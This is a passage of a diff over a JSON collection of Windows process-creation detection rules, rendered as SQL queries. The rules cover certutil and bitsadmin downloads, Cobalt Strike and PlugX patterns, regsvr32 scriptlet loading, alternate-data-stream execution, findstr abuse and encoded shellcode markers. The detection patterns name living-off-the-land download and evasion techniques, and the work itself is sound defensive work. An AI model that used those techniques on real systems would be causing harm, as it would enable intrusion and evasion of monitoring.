'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_certutil_download.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Java Running with Remote Debugging", - "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "title": "File Download Via Bitsadmin", + "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "status": "test", - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file", + "author": "Michael Haag, FPT.EagleEye", "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_remote_debugging.yml" + "filename": "proc_creation_win_bitsadmin_download.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Execute From Alternate Data Streams", + "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "status": "test", + "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_susp_alternate_data_streams.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "status": "test", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", - "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Abusing Findstr for Defense Evasion", + "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "status": "test", + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Administrative findstr usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR NewProcessName LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_lolbin_findstr.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Non Interactive PowerShell Process Spawned", + "id": "f4bbd493-b796-416e-bbf2-121235348529", + "status": "test", + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with a non user process such as \"explorer.exe\" as a parent.", + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "System administrator usage" + "Legitimate programs executing PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND NOT (((ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\') OR ParentProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% --ms-enable-electron-run-as-node %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_powershell_non_interactive_execution.yml" }, { - "title": "Suspicious SysAidServer Child", - "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", "status": "experimental", - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Suspicious Copy From or To System32", - "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", "status": "test", - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1574.002" ], "falsepositives": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_susp_copy_system32.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Child Process Created as System", - "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "status": "test", - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "title": "Hardware Model Reconnaissance Via Wmic.EXE", + "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "status": "experimental", + "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') 